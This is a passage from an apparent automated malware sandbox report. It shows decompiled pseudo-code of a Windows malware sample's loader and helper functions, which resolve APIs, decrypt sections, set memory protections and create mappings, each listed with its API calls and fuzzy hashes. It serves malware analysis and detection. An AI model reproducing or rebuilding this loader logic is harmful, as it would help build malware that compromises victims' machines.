				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E10001BD2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x10004150 + 0x10005014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x10004150 + 0x100050dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E100019CF(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x10004150 + 0x100050ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x10004150 + 0x100050ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x10004150 + 0x10005114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x10004150 + 0x1000512a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E10001C22(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001323
0x10001327
0x100013e9
0x1000132d
0x10001345
0x10001354
0x1000135b
0x1000135f
0x10001362
0x100013e1
0x100013e2
0x10001364
0x10001371
0x10001375
0x10001378
0x00000000
0x1000137a
0x10001387
0x1000138b
0x1000138e
0x00000000
0x10001390
0x1000139d
0x100013a1
0x100013a4
0x00000000
0x100013a6
0x100013b3
0x100013b7
0x100013ba
0x00000000
0x100013bc
0x100013c2
0x100013c7
0x100013ce
0x100013d5
0x100013d8
0x00000000
0x100013da
0x100013dd
0x100013dd
0x100013d8
0x100013ba
0x100013a4
0x1000138e
0x10001378
0x10001362
0x100013f7

APIs

Part of subcall function 10001BD2: HeapAlloc.KERNEL32(00000000,?,10001FD0,?,00000000,00000000,?,10001069), ref: 10001BDE

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,1000127C,?,?,?,00000002,?,?,?), ref: 10001339
GetProcAddress.KERNEL32(00000000,?), ref: 1000135B
GetProcAddress.KERNEL32(00000000,?), ref: 10001371
GetProcAddress.KERNEL32(00000000,?), ref: 10001387
GetProcAddress.KERNEL32(00000000,?), ref: 1000139D
GetProcAddress.KERNEL32(00000000,?), ref: 100013B3

Part of subcall function 10001C22: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00000002), ref: 10001C7F
Part of subcall function 10001C22: memset.NTDLL ref: 10001CA1

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 7f9e8b8effa9776da73fc8af15e11be96d31d9b3ffeda60abd861703891b7db8
Instruction ID: fe109954e7909d3f9f6e433a8377176990291a9dadda8b32ea6cb5e162fec745
Opcode Fuzzy Hash: 7f9e8b8effa9776da73fc8af15e11be96d31d9b3ffeda60abd861703891b7db8
Instruction Fuzzy Hash: 552108B150071ADFE750DFA9C884E9A77ECEB487C07024566E905C7659EA31EA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8291, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00FA82E8
SysAllocString.OLEAUT32(00FA8812), ref: 00FA832B
SysFreeString.OLEAUT32(00000000), ref: 00FA833F
SysFreeString.OLEAUT32(00000000), ref: 00FA834D

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 41131134deb826db9960ebed9fb01b11032e363d542aca0b29b4dfcc556d88de
Instruction ID: 86358190e8e49c66c77a356631527105437e845770c15d5d3873629a2e94ec6a
Opcode Fuzzy Hash: 41131134deb826db9960ebed9fb01b11032e363d542aca0b29b4dfcc556d88de
Instruction Fuzzy Hash: A5310DB2900209EFCF05DF98D8848AE7BB9FF49354B10846DE506D7210DB759946DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100018B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100018B4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x10004130;
				_t39 = E10001568(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x1000414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x10005132; // 0x10005132
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E100015C2(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x1000414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x100018bb
0x100018cb
0x100018d2
0x100018d5
0x100018ea
0x100018f1
0x100018f6
0x10001907
0x1000190a
0x10001912
0x10001915
0x100019bf
0x1000191b
0x1000191b
0x1000191f
0x10001987
0x10001921
0x10001921
0x10001924
0x10001926
0x1000192e
0x10001931
0x10001934
0x1000193c
0x10001944
0x10001945
0x10001946
0x1000194d
0x1000194d
0x10001961
0x10001966
0x1000196f
0x10001976
0x10001979
0x1000197d
0x10001982
0x00000000
0x00000000
0x10001939
0x10001939
0x10001984
0x10001991
0x100019a6
0x10001993
0x1000199c
0x100019a1
0x100019b7
0x100019b7
0x100019c6
0x100019cc

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000190A
memcpy.NTDLL(?,10001045,?,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000199C
VirtualFree.KERNELBASE(10001045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 100019B7

Strings

Dec 21 2020, xrefs: 1000193C

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: fe59e3ce876bfb539fa861a9b9cfecae9c0e82148f33d4892438cc5565000b28
Instruction ID: b04c2c9f5289fe9f3ce3b798613b62a7b986b909cf86b02473ad1d3b0995d0da
Opcode Fuzzy Hash: fe59e3ce876bfb539fa861a9b9cfecae9c0e82148f33d4892438cc5565000b28
Instruction Fuzzy Hash: 46316171E00219AFEB01CF99C891BDEB7F5FF49384F108169E904A7249D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4C35, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FA4C35(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00FA550F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00fa4c41
0x00fa4c45
0x00fa4c46
0x00fa4c47
0x00fa4c49
0x00fa4c4b
0x00fa4c50
0x00fa4c53
0x00fa4cea
0x00fa4cf1
0x00fa4cf1
0x00fa4c5c
0x00fa4c63
0x00fa4c73
0x00fa4c73
0x00fa4c79
0x00fa4c7b
0x00fa4c80
0x00fa4c89
0x00fa4c91
0x00fa4c94
0x00fa4c9f
0x00fa4ca3
0x00fa4ca5
0x00fa4ca6
0x00fa4caf
0x00fa4cb3
0x00fa4cc4
0x00fa4cb5
0x00fa4cba
0x00fa4cbf
0x00fa4cce
0x00fa4cce
0x00fa4ca3
0x00fa4cd4
0x00fa4cda
0x00fa4cda
0x00fa4ce3
0x00fa4ce8
0x00fa4ce8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00FA4C63
lstrlenW.KERNEL32(?), ref: 00FA4C99
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00FA4CBA
SysFreeString.OLEAUT32(?), ref: 00FA4CCE

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 380b1b6de4260d85bdc4b66f7941dda6da7835c324940955c5d91ead624abf4f
Instruction ID: 3381eefd244c427d8971df645aa955922e3d658b36cd68943c13daa6f01a2d11
Opcode Fuzzy Hash: 380b1b6de4260d85bdc4b66f7941dda6da7835c324940955c5d91ead624abf4f
Instruction Fuzzy Hash: FA2156B5E01209FFCB10DFA4D984D9EBBB5FF4A354B108169E905E7210E774EA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000116E() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x10004148 =  *0x10004148 & 0x00000000;
				_push(0);
				_push(0x10004144);
				_push(1);
				_push( *0x10004150 + 0x10005084);
				 *0x10004140 = 0xc; // executed
				L1000178C(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E10001F65( &_v44,  &_v28,  *0x1000414c ^ 0xfd7cd1cf) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x10004138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E10001DBD(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x10004138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E10001252(_v44, _t37); // executed
				goto L7;
			}

0x10001179
0x10001184
0x10001186
0x1000118b
0x10001193
0x10001194
0x1000119e
0x100011a7
0x100011ac
0x100011ca
0x10001229
0x1000122a
0x1000122b
0x1000122b
0x100011d2
0x100011d8
0x100011d8
0x100011e6
0x100011ea
0x100011f1
0x100011f3
0x100011fb
0x100011ff
0x10001205
0x10001217
0x10001207
0x1000120d
0x10001212
0x10001205
0x10001220
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,10004144,00000000), ref: 1000119E
lstrlenW.KERNEL32(?,?,?), ref: 100011D2

Part of subcall function 10001DBD: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A,?), ref: 10001DCA
Part of subcall function 10001DBD: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DE0
Part of subcall function 10001DBD: _snwprintf.NTDLL ref: 10001E05
Part of subcall function 10001DBD: CreateFileMappingW.KERNELBASE(000000FF,10004140,00000004,00000000,?,?), ref: 10001E2A
Part of subcall function 10001DBD: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E41
Part of subcall function 10001DBD: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF), ref: 10001E76

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 1000120D
ExitThread.KERNEL32 ref: 1000122B

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: 9b7e6d5e4ce4092a565944a83a2170496299c577230c9ff7ec0056355b7551d4
Instruction ID: 026376c05ab4c61b73fdaba5d0631372bd63cec38eb327a8236e93e859c94f52
Opcode Fuzzy Hash: 9b7e6d5e4ce4092a565944a83a2170496299c577230c9ff7ec0056355b7551d4
Instruction Fuzzy Hash: 4A1188B6104301ABF701DB60CC89FCB77ECEB98384F024929F501D71A9EB30E5988B55

Uniqueness

Uniqueness Score: -1.00%

Function 00D5B730, Relevance: 4.7, APIs: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D5B775
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D5B83F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00D5B970

Memory Dump Source

Source File: 00000000.00000002.1202733417.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false

Similarity

API ID: Virtual$Alloc$Protect
String ID:
API String ID: 655996629-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 3a783ab9e63c83f0221434e944aa052c1376b44d39ccf0ec73bc8ae8a200eb65
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 52B1A9B4A00109DFCB48CF84C591AAEB7B5FF88315F248159E915AB341D735EE86CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4B22, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA4B22() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t54;

				_v12 = 0;
				_t23 = E00FA94F1(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xfad230; // 0x2a9a5a8
				_t4 = _t24 + 0xfaed80; // 0x3a49328
				_t5 = _t24 + 0xfaed28; // 0x4f0053
				_t26 = E00FA8393( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xfad230; // 0x2a9a5a8
						_t11 = _t32 + 0xfaed74; // 0x3a4931c
						_t48 = _t11;
						_t12 = _t32 + 0xfaed28; // 0x4f0053
						_t54 = E00FA7502(_t11, _t12, _t11);
						_t58 = _t54;
						if(_t54 != 0) {
							_t35 =  *0xfad230; // 0x2a9a5a8
							_t13 = _t35 + 0xfaedbe; // 0x30314549
							if(E00FA63EE(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
								_t60 =  *0xfad214 - 6;
								if( *0xfad214 <= 6) {
									_t42 =  *0xfad230; // 0x2a9a5a8
									_t15 = _t42 + 0xfaebda; // 0x52384549
									E00FA63EE(_t48, _t60, _v8, _t54, _t15, 0x13);
								}
							}
							_t38 =  *0xfad230; // 0x2a9a5a8
							_t17 = _t38 + 0xfaedb8; // 0x3a49360
							_t18 = _t38 + 0xfaed90; // 0x680043
							_t45 = E00FA63AB(_v8, 0x80000001, _t54, _t18, _t17);
							HeapFree( *0xfad1f0, 0, _t54);
						}
					}
					HeapFree( *0xfad1f0, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00FA72B8(_t53);
				}
				return _t45;
			}

0x00fa4b32
0x00fa4b35
0x00fa4b3c
0x00fa4b3e
0x00fa4b3e
0x00fa4b41
0x00fa4b46
0x00fa4b4d
0x00fa4b5a
0x00fa4b5f
0x00fa4b63
0x00fa4b71
0x00fa4b7f
0x00fa4b83
0x00fa4c14
0x00fa4c14
0x00fa4b89
0x00fa4b89
0x00fa4b8e
0x00fa4b8e
0x00fa4b95
0x00fa4ba1
0x00fa4ba3
0x00fa4ba5
0x00fa4ba7
0x00fa4bae
0x00fa4bc0
0x00fa4bc2
0x00fa4bc9
0x00fa4bcb
0x00fa4bd2
0x00fa4bdd
0x00fa4bdd
0x00fa4bc9
0x00fa4be2
0x00fa4be7
0x00fa4bee
0x00fa4c0c
0x00fa4c0e
0x00fa4c0e
0x00fa4ba5
0x00fa4c20
0x00fa4c20
0x00fa4c22
0x00fa4c27
0x00fa4c29
0x00fa4c29
0x00fa4c34

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03A49328,00000000,?,73BCF710,00000000,73BCF730), ref: 00FA4B71
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03A49360,?,00000000,30314549,00000014,004F0053,03A4931C), ref: 00FA4C0E
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FA9CB1), ref: 00FA4C20

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 37c3877bd290088e8034bb2c8070f4d19904ac78ff0a945cdc6cd5f9e1b20ea2
Instruction ID: c8e0fe6c52d1b1921544f02abd677c255324a304287c9081e2262001c715c23a
Opcode Fuzzy Hash: 37c3877bd290088e8034bb2c8070f4d19904ac78ff0a945cdc6cd5f9e1b20ea2
Instruction Fuzzy Hash: 1A317EF2900108BEDB11EB94DD85EEA7BACFF86750F1400A5F605A7161D7B0AE05FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7790, Relevance: 4.6, APIs: 3, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FA7790(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t23;
				long _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t52;

				_t43 = __ecx;
				_t42 = _a16;
				_t48 = __eax;
				_t23 =  *0xfad230; // 0x2a9a5a8
				_t2 = _t23 + 0xfae671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0xfad204 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t30 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xfad204 =  *0xfad204 + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E00FAA93C(_t50, _t49);
					_t34 = E00FA93F5(_t47, _t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0xfad204 < 5) {
							 *0xfad204 =  *0xfad204 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00FA54F9();
					HeapFree( *0xfad1f0, 0, _t49);
					goto L9;
				}
				_t51 =  *0xfad230; // 0x2a9a5a8
				_t4 = _t51 + 0xfae7c4; // 0x6976612e
				_t52 = _t4;
				if(RtlAllocateHeap( *0xfad1f0, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E00FA90BA(_a4, _t43, _t47, _t52,  &_v48,  &_v8,  &_a16, _t37); // executed
				goto L5;
			}

0x00fa7790
0x00fa7797
0x00fa779e
0x00fa77a2
0x00fa77a7
0x00fa77b2
0x00fa77c2
0x00fa780b
0x00fa780f
0x00fa7813
0x00fa7814
0x00fa7817
0x00fa781c
0x00fa781c
0x00fa781f
0x00fa7823
0x00fa785d
0x00fa785d
0x00fa7863
0x00fa786a
0x00fa786a
0x00fa7825
0x00fa7828
0x00fa782a
0x00fa7837
0x00fa7839
0x00fa7840
0x00fa7877
0x00fa787c
0x00fa787e
0x00fa7880
0x00fa7880
0x00000000
0x00fa787e
0x00fa7842
0x00fa7849
0x00fa7857
0x00000000
0x00fa7857
0x00fa77c4
0x00fa77d7
0x00fa77d7
0x00fa77e5
0x00fa77ff
0x00000000
0x00fa77ff
0x00fa77f8
0x00000000

APIs

wsprintfA.USER32 ref: 00FA77B2
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA77DD

Part of subcall function 00FA90BA: GetTickCount.KERNEL32 ref: 00FA90D1
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA911E
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA913B
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA915B
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA9179
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA919C
Part of subcall function 00FA90BA: wsprintfA.USER32 ref: 00FA91BD

HeapFree.KERNEL32(00000000,00FA9CFB,?,?,00FA9CFB,?), ref: 00FA7857

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: a842dda329d1066bb50e92ca39ed18052c5cb616da431d3874f2531b33d4c14b
Instruction ID: 82bdf66b46fc2ea959ffc3ef5827531480566942b94fc91511908d8455bc1906
Opcode Fuzzy Hash: a842dda329d1066bb50e92ca39ed18052c5cb616da431d3874f2531b33d4c14b
Instruction Fuzzy Hash: 41314BB2500209EBCB01EF64DD84F9A7BFCFB0A354F108026F912A7251D734E955EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10001CCA(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x10001cca
0x10001cd4
0x10001cd9
0x10001ce5
0x10001cf2
0x10001cf8
0x10001cfa
0x10001d00
0x10001d6c
0x10001d73
0x10001d73
0x10001d02
0x10001d05
0x10001d05
0x10001d09
0x00000000
0x00000000
0x10001d0b
0x10001d0f
0x10001d24
0x10001d28
0x10001d3e
0x10001d2a
0x10001d2a
0x10001d33
0x10001d39
0x10001d39
0x10001d11
0x10001d11
0x10001d1a
0x10001d1f
0x10001d1f
0x10001d4f
0x10001d53
0x10001d5b
0x10001d5b
0x10001d5e
0x10001d61
0x10001d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d6a
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 10001CF8
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001D4F
GetLastError.KERNEL32(?,?), ref: 10001D55

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: d88e53f8efb20e6d8783475941c1d8e84c3c5500017356f691ac8a8b67d88bbc
Instruction ID: d734dc8d30302c8daee21811a107f0bac81e6e6e1e596fd8e7321511c0c59d4b
Opcode Fuzzy Hash: d88e53f8efb20e6d8783475941c1d8e84c3c5500017356f691ac8a8b67d88bbc
Instruction Fuzzy Hash: 4721A276900109EFEB20CF99CC84EEEF7F9FB54395F24855AE64067105D3749A89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3F83, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00FA3F83(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
